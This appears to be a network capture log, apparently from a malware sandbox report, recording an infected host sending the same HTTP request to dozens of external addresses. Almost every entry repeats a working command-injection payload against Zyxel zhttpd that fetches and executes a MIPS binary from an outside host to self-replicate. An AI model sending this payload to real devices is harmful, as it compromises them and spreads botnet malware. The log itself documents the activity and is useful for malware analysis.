                                            Feb 2, 2024 06:21:04.478857040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2357192.168.2.1536654115.111.13.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478907108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2358192.168.2.1560008180.166.189.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478914022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2359192.168.2.153939068.98.129.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478945017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2360192.168.2.154920449.156.235.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.478981972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2361192.168.2.154340063.244.63.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479036093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2362192.168.2.1535510157.115.241.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479064941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2363192.168.2.155064032.21.36.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479110956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2364192.168.2.153766818.213.230.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479152918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2365192.168.2.1560826167.134.73.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479178905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2366192.168.2.155589013.182.237.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479223967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2367192.168.2.155155052.237.165.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479273081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2368192.168.2.1539776204.98.120.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479298115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2369192.168.2.1552014167.240.80.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479363918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2370192.168.2.1552500212.84.160.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479381084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2371192.168.2.155424819.243.242.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479407072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2372192.168.2.154664667.104.155.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479432106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2373192.168.2.1554214146.21.161.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479464054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2374192.168.2.154102481.92.63.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479471922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2375192.168.2.1548288195.97.38.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479516029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2376192.168.2.153702612.82.116.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.479574919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2377192.168.2.1546518147.99.183.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.482553005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2378192.168.2.155997299.213.106.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.482585907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2379192.168.2.1538292160.115.242.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.482647896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2380192.168.2.1549980186.201.108.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490372896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2381192.168.2.154931644.233.163.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490403891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2382192.168.2.1541612146.81.149.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490439892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2383192.168.2.1542502204.234.6.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490478992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2384192.168.2.1550454131.155.103.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490540981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2385192.168.2.155111482.204.23.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490567923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2386192.168.2.1534128133.197.227.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490622997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2387192.168.2.1537444117.120.135.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490660906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2388192.168.2.1548534134.50.15.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490712881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2389192.168.2.154730436.220.142.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490768909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2390192.168.2.1560648144.33.153.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490802050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2391192.168.2.1534666143.107.82.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490861893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2392192.168.2.1545516119.182.178.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490901947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2393192.168.2.153818877.179.231.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.490964890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2394192.168.2.155949645.4.242.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491024017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2395192.168.2.154269648.42.14.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491024971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2396192.168.2.1552196123.67.172.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491055012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2397192.168.2.154347479.96.187.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491097927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2398192.168.2.1554220106.198.109.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491122007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2399192.168.2.153546874.247.63.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491163015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2400192.168.2.155965493.152.149.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491219997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2401192.168.2.153959043.111.206.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491235971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2402192.168.2.1558502216.246.102.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491300106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2403192.168.2.155212480.77.216.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491345882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2404192.168.2.1547934152.151.254.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491394997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2405192.168.2.155535867.48.239.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491434097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2406192.168.2.155690074.204.47.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491463900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2407192.168.2.1550222130.46.186.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491493940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2408192.168.2.153967864.174.197.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491535902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2409192.168.2.1555446222.204.225.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491592884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2410192.168.2.153927876.87.7.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491619110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2411192.168.2.155308486.100.72.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491673946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2412192.168.2.1551748203.1.29.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491715908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2413192.168.2.1549176124.50.71.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491753101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2414192.168.2.1554542132.18.27.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491787910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2415192.168.2.155116470.114.108.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491822004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2416192.168.2.1553896180.97.228.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491858959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2417192.168.2.1538852200.220.19.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491899967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2418192.168.2.155685014.217.36.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491925955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2419192.168.2.1560404118.135.99.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.491966963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2420192.168.2.1560578207.56.192.161443
                                            TimestampBytes transferredDirectionData
